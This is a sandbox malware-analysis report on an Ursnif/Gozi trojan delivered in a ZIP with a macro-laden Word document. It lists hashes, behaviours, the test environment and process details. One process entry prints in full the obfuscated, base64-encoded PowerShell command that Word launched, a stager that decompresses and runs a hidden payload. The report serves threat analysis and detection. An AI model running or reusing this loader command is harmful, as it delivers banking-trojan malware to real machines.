General Info

File name

SPAM2.zip

Full analysis
https://app.any.run/tasks/c8e20bba-c362-4596-adbb-2e46940ebaef
Verdict
Malicious activity
Analysis date
7/18/2019, 16:49:10
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:

macros

macros-on-open

gozi

ursnif

trojan

dreambot

Indicators:

MIME:
application/zip
File info:
Zip archive data, at least v2.0 to extract
MD5

b3f3636560e23bd67c8818deb247c3e5

SHA1

e3ed2bb34418f3c2867746a57e7a647d9f2dee01

SHA256

0eae1f57f48a22fd2ae7361e8a24432b3d28ce2f07cbec474d1e75889939205a

SSDEEP

3072:Hf/Q5ewaZha9h3kj+mbh5Sp4/N/mG4u7iMMtNvk9xBkQSMA1oAqDS:Hxha91gfbxVmG4uov89U36Aq+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
660 seconds
Additional time used
none
Fakenet option
off
Heavy Evaision option
off
MITM proxy
on
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
off

Software preset

  • Internet Explorer 11.0.9600.18860 KB4052978
  • Adobe Acrobat Reader DC MUI (15.007.20033)
  • Adobe Flash Player 27 ActiveX (27.0.0.187)
  • Adobe Flash Player 27 NPAPI (27.0.0.187)
  • Adobe Flash Player 27 PPAPI (27.0.0.187)
  • CCleaner (5.35)
  • Google Chrome (75.0.3770.100)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (64-bit) (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.7.2 (4.7.03062)
  • Microsoft Office Access MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Office 32-bit Components 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Professional 2010 (14.0.4763.1000)
  • Microsoft Office Proof (English) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (French) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared 32-bit MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Single Image 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Visual C++ 2005 Redistributable (x64) (8.0.61000)
  • Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (11.0.61030.0)
  • Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (11.0.61030)
  • Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (11.0.61030)
  • Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X64 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 67.0.4 (x64 en-US) (67.0.4)
  • Mozilla Maintenance Service (67.0.4)
  • Notepad++ (64-bit x64) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype™ 7.39 (7.39.102)
  • Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (64-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Hyphenation Parent Package English
  • IE Spelling Parent Package English
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • InternetExplorer Package TopLevel
  • KB2479943
  • KB2491683
  • KB2506014
  • KB2506212
  • KB2506928
  • KB2509553
  • KB2532531
  • KB2533552
  • KB2534111
  • KB2545698
  • KB2547666
  • KB2552343
  • KB2560656
  • KB2563227
  • KB2564958
  • KB2579686
  • KB2585542
  • KB2585542 SP1
  • KB2598845
  • KB2603229
  • KB2604115
  • KB2620704
  • KB2621440
  • KB2631813
  • KB2640148
  • KB2653956
  • KB2654428
  • KB2656356
  • KB2656356 SP1
  • KB2660075
  • KB2667402
  • KB2685811
  • KB2685813
  • KB2685939
  • KB2690533
  • KB2698365
  • KB2705219
  • KB2706045
  • KB2719857
  • KB2726535
  • KB2727528
  • KB2729094
  • KB2729452
  • KB2732059
  • KB2732487
  • KB2736422
  • KB2742599
  • KB2750841
  • KB2758857
  • KB2761217
  • KB2763523
  • KB2770660
  • KB2773072
  • KB2786081
  • KB2789645
  • KB2789645 SP1
  • KB2791765
  • KB2799926
  • KB2800095
  • KB2807986
  • KB2808679
  • KB2813430
  • KB2834140
  • KB2836942
  • KB2836943
  • KB2840631
  • KB2843630
  • KB2847927
  • KB2852386
  • KB2853952
  • KB2861698
  • KB2862152
  • KB2862330
  • KB2862335
  • KB2864202
  • KB2868038
  • KB2871997
  • KB2884256
  • KB2888049
  • KB2891804
  • KB2892074
  • KB2893294
  • KB2893519
  • KB2894844
  • KB2900986
  • KB2908783
  • KB2911501
  • KB2912390
  • KB2918077
  • KB2919469
  • KB2931356
  • KB2937610
  • KB2943357
  • KB2952664
  • KB2966583
  • KB2968294
  • KB2970228
  • KB2972100
  • KB2972211
  • KB2973112
  • KB2973201
  • KB2973351
  • KB2977292
  • KB2978120
  • KB2978742
  • KB2984972
  • KB2985461
  • KB2991963
  • KB2992611
  • KB3003743
  • KB3004361
  • KB3004375
  • KB3006121
  • KB3006137
  • KB3010788
  • KB3011780
  • KB3013531
  • KB3019978
  • KB3020370
  • KB3021674
  • KB3021917
  • KB3022777
  • KB3023215
  • KB3030377
  • KB3031432
  • KB3035126
  • KB3035132
  • KB3037574
  • KB3042058
  • KB3045685
  • KB3046017
  • KB3046269
  • KB3054476
  • KB3055642
  • KB3059317
  • KB3060716
  • KB3067903
  • KB3068708
  • KB3071756
  • KB3072305
  • KB3074543
  • KB3075220
  • KB3076895
  • KB3078601
  • KB3078667
  • KB3080149
  • KB3084135
  • KB3086255
  • KB3092601
  • KB3092627
  • KB3093513
  • KB3097989
  • KB3101722
  • KB3107998
  • KB3108371
  • KB3108381
  • KB3108664
  • KB3109103
  • KB3109560
  • KB3110329
  • KB3115858
  • KB3115858 SP1
  • KB3122648
  • KB3124275
  • KB3126587
  • KB3127220
  • KB3133977
  • KB3137061
  • KB3138378
  • KB3138612
  • KB3138910
  • KB3139398
  • KB3139914
  • KB3140245
  • KB3147071
  • KB3150220
  • KB3155178
  • KB3156016
  • KB3156019
  • KB3159398
  • KB3161102
  • KB3161949
  • KB3161958
  • KB3170735
  • KB3170735 SP1
  • KB3172605
  • KB3177467
  • KB3179573
  • KB3184143
  • KB4019990
  • KB4040980
  • KB976902
  • KB982018
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • Package 1 for KB2656356
  • Package 1 for KB2789645
  • Package 1 for KB3115858
  • Package 1 for KB3170735
  • Package 2 for KB2585542
  • Package 2 for KB2656356
  • Package 2 for KB2789645
  • Package 2 for KB3115858
  • Package 2 for KB3170735
  • Package 3 for KB2585542
  • Package 3 for KB2656356
  • Package 4 for KB2656356
  • Package 4 for KB2789645
  • Package 5 for KB2656356
  • Package 7 for KB2656356
  • PlatformUpdate Win7 SRV08R2 Package TopLevel
  • ProfessionalEdition
  • RollupFix
  • UltimateEdition
  • WUClient SelfUpdate ActiveX
  • WUClient SelfUpdate Aux TopLevel
  • WUClient SelfUpdate Core TopLevel

Behavior activities

MALICIOUS SUSPICIOUS INFO
Connects to CnC server
  • IEXPLORE.EXE (PID: 2828)
  • IEXPLORE.EXE (PID: 2640)
  • IEXPLORE.EXE (PID: 2476)
URSNIF was detected
  • IEXPLORE.EXE (PID: 2640)
  • IEXPLORE.EXE (PID: 2828)
  • powershell.exe (PID: 2080)
  • IEXPLORE.EXE (PID: 2476)
Executes PowerShell scripts
  • WINWORD.EXE (PID: 2904)
Unusual execution from Microsoft Office
  • WINWORD.EXE (PID: 2904)
Application was dropped or rewritten from another process
  • styer10.gxl.exe (PID: 3012)
Executed via COM
  • iexplore.exe (PID: 1924)
  • iexplore.exe (PID: 1440)
  • iexplore.exe (PID: 2448)
Creates files in the user directory
  • powershell.exe (PID: 2080)
Reads the machine GUID from the registry
  • powershell.exe (PID: 2080)
  • WinRAR.exe (PID: 2940)
Executable content was dropped or overwritten
  • WinRAR.exe (PID: 2940)
Creates files in the user directory
  • WINWORD.EXE (PID: 2904)
  • IEXPLORE.EXE (PID: 2640)
  • IEXPLORE.EXE (PID: 2476)
  • IEXPLORE.EXE (PID: 2828)
Reads settings of System Certificates
  • IEXPLORE.EXE (PID: 2476)
  • iexplore.exe (PID: 1440)
  • iexplore.exe (PID: 2448)
  • IEXPLORE.EXE (PID: 2828)
Reads internet explorer settings
  • IEXPLORE.EXE (PID: 2640)
  • IEXPLORE.EXE (PID: 2828)
  • IEXPLORE.EXE (PID: 2476)
Reads Internet Cache Settings
  • iexplore.exe (PID: 1924)
  • iexplore.exe (PID: 1440)
  • iexplore.exe (PID: 2448)
Reads the machine GUID from the registry
  • iexplore.exe (PID: 1924)
  • iexplore.exe (PID: 1440)
  • iexplore.exe (PID: 2448)
  • WINWORD.EXE (PID: 2904)
Changes internet zones settings
  • iexplore.exe (PID: 1924)
  • iexplore.exe (PID: 1440)
  • iexplore.exe (PID: 2448)
Manual execution by user
  • styer10.gxl.exe (PID: 3012)
  • WINWORD.EXE (PID: 2904)
Reads Microsoft Office registry keys
  • WINWORD.EXE (PID: 2904)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.zip
|   ZIP compressed archive (100%)
EXIF
ZIP
ZipRequiredVersion:
20
ZipBitFlag:
null
ZipCompression:
Deflated
ZipModifyDate:
2019:07:18 16:38:23
ZipCRC:
0xa0a27187
ZipCompressedSize:
162839
ZipUncompressedSize:
287232
ZipFileName:
styer10.gxl.exe

Video and screenshots

Processes

Total processes
50
Monitored processes
10
Malicious processes
8
Suspicious processes
0

Behavior graph

+
start winrar.exe styer10.gxl.exe no specs winword.exe no specs #URSNIF powershell.exe iexplore.exe #URSNIF iexplore.exe iexplore.exe #URSNIF iexplore.exe iexplore.exe #URSNIF iexplore.exe
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
2940
CMD
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\SPAM2.zip"
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.60.0
Modules
Image
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\uxtheme.dll
c:\windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_145eb2808b8d6928\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\riched20.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wpdshext.dll
c:\windows\system32\winmm.dll
c:\windows\system32\portabledeviceapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ehstorapi.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\profapi.dll
c:\windows\installer\{90140000-003d-0000-1000-0000000ff1ce}\wordicon.exe
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll

PID
3012
CMD
"C:\Users\admin\Desktop\styer10.gxl.exe"
Path
C:\Users\admin\Desktop\styer10.gxl.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Paper Other
Description
Loud Smile Pr Thing
Version
2.4.82.85 Better
Modules
Image
c:\users\admin\desktop\styer10.gxl.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\lpk.dll
c:\windows\syswow64\usp10.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\sspicli.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\msctf.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\clbcatq.dll
c:\windows\syswow64\wbem\wbemprox.dll
c:\windows\syswow64\wbemcomn.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\nsi.dll
c:\windows\syswow64\cryptsp.dll
c:\windows\syswow64\rsaenh.dll
c:\windows\syswow64\rpcrtremote.dll
c:\windows\syswow64\wbem\wbemsvc.dll
c:\windows\syswow64\wbem\fastprox.dll
c:\windows\syswow64\ntdsapi.dll
c:\program files (x86)\internet explorer\ieproxy.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\syswow64\sxs.dll

PID
2904
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Ursnif_Usa.doc"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.5123.5000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251\msvcr90.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\winspool.drv
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\program files\microsoft office\office14\gkword.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_145eb2808b8d6928\gdiplus.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\fm20.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\fm20enu.dll
c:\windows\system32\comsvcs.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\program files\microsoft office\office14\msproof7.dll
c:\program files\microsoft office\office14\msohev.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\spool\drivers\x64\3\unidrvui.dll
c:\windows\system32\spool\drivers\x64\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\x64\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\oleacc.dll
c:\program files\common files\system\ado\msadox.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\crypt32.dll

PID
2080
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Enc IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtACgAWwBzAHkAUwB0AGUAbQAuAEkATwAuAE0ARQBNAE8AcgBZAHMAdAByAGUAQQBtAF0AWwBzAFkAUwBUAGUATQAuAEMATwBOAFYAZQByAFQAXQA6ADoARgBSAG8ATQBCAGEAcwBlADYANABzAHQAcgBpAG4ARwAoACcAVABaAEIAYgBhADgASgBBAEUASQBYAGYAQwAvADAAUAArADUAQwB5AEMAZABhAE4AYQBVAFcASgBJAFoAUgBpAHAASQBSAEsARgBDADkARQBlAGcASABYAE8ATABtADAATQBiAHQAawBWADUATQBZAC8ATwA5AE4AUQBXADEAZgBaAGwANwBPAG0AVABuAGYAVQBkAHoASwA1AGYAUgAxAGoAbQB5AEUAagAyAC8AagBvADcAUAB5AHMASwBVAHMAZQBjAEYAOQAzADEAWQBnAE8AdwB6ADIAQQBuAEsAZQBzAHoAQgBKAG8AWQBVAC8AYwBFAHMANQBPADEAcQBZAFEAQQBtAE4AbQBIAFYARABjADcAbQAxAGkAWQBvAHoAMwBNAEoAUQB0AEYAbQB6AE4AbAA4AFEAUwBLAHcAaABEADkAYQBMAE4AZgBGAGgAcwB4ADYATwBFAC8AQQBXAGwAbgBMAFkAegA1AHoASgA4ADMARgBvADQAMQBoAEsAUAB0AEQAMQBiAGQAawB4AHoARgBLAGsAQgBxAGMAQgBrAEwASQA2ADYAcQBJAHEAbQBCADUARwBqAEIAVwBFAHgALwB3AHAAdABZAFcAcwBJAEQAZABJAFYASwBhAFkAQwBKADQAbQBVAHMAVgAzAFcATABOAEMAbABnAE0ATgBZAGwAVgB4AHAAMwB6AFgAOQBSAEkAZgBKAFIAbQA2AFAAdABCAHEAbQBWAGYAMQBPAFIANQB4AFcATwBHAGwAagBEAHEAaABtADQANwArAEQAUABmAG8AegBLAHAAWgBiAG8AaABVAHQAWQBGADQAQQBkAGwAMgBHAHcASQBKAHoAZABnADEAQwBCAGMARgBTAFUAZgBlAGkANAB4AFIATwB3AEwAMABZAFAAYgA3AEcAcQByAGYAbgBZAFIARwBHAFIATQB5AEMAUQBTAFoANQBpAHcAQQBJAFQANABIAGcALwBtAEMAegBxAFIANgB2AGIAeABwAFUAbgA1AGIAcAAxAE4AQQBaAFIARABYAHAANQBPAEYAMwBOAEYASwAvAFIAYwBzAEcAMAArAG8ATQA1AGUANQBtADAAWABxAHAAUgBXAGoAWQB4AEwARAA3AEIARwBqADEAeQBWADkAVQAzAC8AOABiAFEASgByAG0AbgBWADcAOAB3AE0APQAnACkAIAAsAFsAcwBZAHMAVABlAG0ALgBpAG8ALgBjAE8ATQBwAFIAZQBTAHMAaQBPAE4ALgBDAG8AbQBwAHIAZQBzAHMASQBPAE4ATQBPAEQARQBdADoAOgBEAEUAQwBvAG0AcAByAGUAUwBTACAAKQB8ACYAKAAnAGYAJwArACcAbwByAGUAJwArACcAYQBjAEgAJwApAHsAIAAmACgAJwBOAEUAVwAtAG8AYgAnACsAJwBKACcAKwAnAEUAYwBUACcAKQAgACAAaQBgAG8ALgBgAFMAYABUAHIAZQBhAG0AUgBFAEEARABFAFIAKAAkAF8ALABbAHMAeQBTAFQAZQBtAC4AVABFAHgAVAAuAEUATgBjAG8AZABJAG4ARwBdADoAOgBhAHMAQwBpAGkAKQAgAH0AfAAuACgAJwBGAG8AcgBFAGEAJwArACcAQwAnACsAJwBIACcAKQB7ACQAXwAuAHIAZQBhAGQAdABvAGUAbgBkACgAKQAgAH0AIAApACAAfAAuACgAJwBJACcAKwAnAEUAJwAgACsAIAAnAFgAJwApAA==
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
WINWORD.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\userenv.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorwks.dll
c:\windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system\9b0615d346556a8ae639dcec168731cc\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\fabca41dc6cc22a902c2525408b49ab9\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management.a#\d5ab9ebdfc2bacea66210c16fff703d2\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.core\2706ddbd765b8a111d3083f8af88ef03\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\326a4488a1881b3bd8ea1e8f4dd7420f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.configuratio#\1e9190c7a12053ea715c8d8ef8faddd1\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.wsman.man#\23314086651ff4d13264ef3cd19e0b4e\microsoft.wsman.management.ni.dll
